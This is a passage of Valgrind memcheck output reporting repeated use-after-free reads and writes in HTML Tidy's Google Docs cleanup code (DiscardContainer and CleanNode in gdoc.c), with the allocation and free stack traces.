==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e70 is 32 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D50D: DiscardContainer (src/gdoc.c:70)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e60 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D511: DiscardContainer (src/gdoc.c:70)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c46d08 is 8 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D52E: DiscardContainer (src/gdoc.c:75)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e58 is 8 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D56A: DiscardContainer (src/gdoc.c:81)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e68 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D572: DiscardContainer (src/gdoc.c:81)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42c48 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D57A: DiscardContainer (src/gdoc.c:83)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e68 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D595: DiscardContainer (src/gdoc.c:84)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c43070 is 0 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D59C: DiscardContainer (src/gdoc.c:83)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c43080 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D5AD: DiscardContainer (src/gdoc.c:86)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e68 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D5BC: DiscardContainer (src/gdoc.c:88)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e68 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid write of size 8
==1752197== at 0x41D5C8: DiscardContainer (src/gdoc.c:88)
==1752197== by 0x41D303: CleanNode (src/gdoc.c:114)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4c42e60 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
